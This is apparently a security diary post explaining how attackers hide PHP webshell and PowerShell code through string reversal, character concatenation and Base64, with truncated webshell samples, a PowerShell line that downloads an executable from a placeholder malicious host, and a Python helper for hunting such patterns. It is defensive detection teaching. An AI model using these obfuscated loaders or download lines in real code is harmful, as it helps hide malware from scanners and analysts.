Basic Obfuscation With Permissive Languages

For attackers, obfuscation is key to keeping their malicious code under the radar. Code is obfuscated for two main reasons: to defeat automatic detection by AV solutions or tools like YARA (which still rely mainly on signatures), and to make the code difficult for a security analyst to read and understand.

Languages like PHP or PowerShell are very permissive in the way they handle variables and functions. They also provide plenty of functions that are not malicious at all in themselves but that can sometimes “ring a bell” when found in a piece of code. A few days ago, I found a webshell sample that was Base64 encoded (classic behaviour) but, instead of calling the decoding function directly, stored its name in a variable. Once the name sits in a variable, it can be obfuscated too. Check out this piece of code:

<?php
$D=strrev('edoced_46esab');   // $D now holds "base64_decode"
$s=gzinflate($D('7X39d9s2sujvPaf/A83qBmIi0ZKcdLOSKdtNnE3e5uvGzrZ9tq9KSZTEhiJV...

strrev() is a simple PHP function that reverses a string. $D therefore contains “base64_decode”, and its output is passed to gzinflate(), which yields the real code. Simple!

But PHP is not the only language that allows this. PowerShell does too. There is no native strrev() function in PowerShell (as far as I know, but I’m not a PowerShell “guru”). So, let’s create our own strrev():

function strrev() {
  param([string]$s)
  $in = $s.ToCharArray()   # split the string into a char array
  [array]::Reverse($in)    # reverse it in place
  $out = -join($in)        # join the chars back into a string
  return $out
}

Give the function a random name and you can now rebuild and call a suspicious function without its name ever appearing in clear text:

$a = "tseuqeRbeW-ekovnI"                           # "Invoke-WebRequest" reversed
$b = lyJF5FnYlGDP($a)                              # our strrev() under a random name
$data = &$b "hxxp://www.malicious.site/sample.exe"  # the call operator invokes Invoke-WebRequest

So, it could be a good idea to include interesting or rare function names (such as strrev()) in your hunting regexes or YARA rules. Here are some other examples grabbed mainly from pastebin.com:

<?php
$v1 = strrev("edoced_46esab");
$v2 = strrev("sserpmocnuzg");
eval($v2($v1("eF7VPO1227aS/3NO3gFh1FJqFEuynSaVRPrGlrzx…

Or this one:

<?php
$thycsy=chr(99)."r".chr(101).chr(97)."t".chr(101).chr(95)."\x66"."u".chr(110).chr(99)."t"."i"."\x6f"."n";  // "create_function"
$szsglt = $thycsy('$a',strrev(';)a$(lave'));   // create_function('$a', 'eval($a);')
$szsglt(strrev(';))"=oQD9lQCK0QfJkQCK0gCNsjZ1JGJg8GajVWCJkQCK0QfJkQCJoQDJkQ..."(edoced_46esab(lave'));?>

Base64 encoded strings are also everywhere (think about all the email attachments). If you are hunting for interesting strings, search for them in ASCII and encoded with two bytes per character (use the ‘wide’ YARA keyword[1]), but also search for their Base64 encoded version! Some examples:

  • "Confidential" : Q29uZmlkZW50aWFs
  • "Invoke-Expression": SW52b2tlLUV4cHJlc3Npb24=
  • "ShellExecute": U2hlbGxFeGVjdXRl
  • "eval": ZXZhbA==

Simple obfuscation technique but it works!
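As an added example that is not part of the diary, here is a small Python hunting helper that turns a list of names worth flagging into the search terms recommended above: the name as-is, reversed (to spot strrev('...') tricks), and Base64 encoded in ASCII and wide form. It also handles a caveat the list above glosses over: a string inside a longer Base64 blob has three possible alignments, and a single b64encode() gives only one of them. The suspicious-name list and the sample snippets are constructed for illustration.

```python
import base64

# Names that are benign on their own but "ring a bell" in obfuscated code.
SUSPICIOUS = ["base64_decode", "gzuncompress", "gzinflate", "eval",
              "create_function", "Invoke-WebRequest", "Invoke-Expression"]

def base64_variants(word: str, wide: bool = False) -> set[str]:
    """Base64 substrings covering `word` at each of the three alignments it
    can have inside a longer blob. A single b64encode(word) only matches
    alignment 0. wide=True encodes the UTF-16LE form (YARA 'wide')."""
    raw = word.encode("utf-16-le" if wide else "ascii")
    variants = set()
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + raw).decode().rstrip("=")
        # Keep only characters whose 6 bits lie entirely inside `raw`: the
        # first ones depend on the padding, the last on whatever follows.
        start = (8 * pad + 5) // 6
        end = (8 * (pad + len(raw))) // 6
        variants.add(enc[start:end])
    return variants

def indicators(word: str) -> dict[str, set[str]]:
    """Search terms for one name: as-is, reversed (catches strrev('...')
    tricks) and Base64-encoded, ASCII and wide."""
    return {
        "plain": {word},
        "reversed": {word[::-1]},
        "base64": base64_variants(word) | base64_variants(word, wide=True),
    }

def hunt(text: str) -> dict[str, set[str]]:
    """Map each suspicious name found in `text` to the technique(s) that
    exposed it. Matching is case-sensitive because Base64 is."""
    hits: dict[str, set[str]] = {}
    for name in SUSPICIOUS:
        for technique, terms in indicators(name).items():
            if any(t in text for t in terms):
                hits.setdefault(name, set()).add(technique)
    return hits

# Constructed samples modelled on the diary's snippets (not real malware).
SAMPLES = [
    "$D=strrev('edoced_46esab');",
    '$v2 = strrev("sserpmocnuzg");',
    # Encoded at alignment 2, so naive b64("Invoke-Expression") is absent.
    base64.b64encode(b"x=Invoke-Expression $payload").decode(),
]

for sample in SAMPLES:
    print(sample[:32], "->", hunt(sample))
```

Short names such as eval yield four- or five-character Base64 fragments that will false-positive in any sizeable blob, so reserve the Base64 terms for longer names.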

[1] https://yara.readthedocs.io/en/v3.4.0/writingrules.html?highlight=wide

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant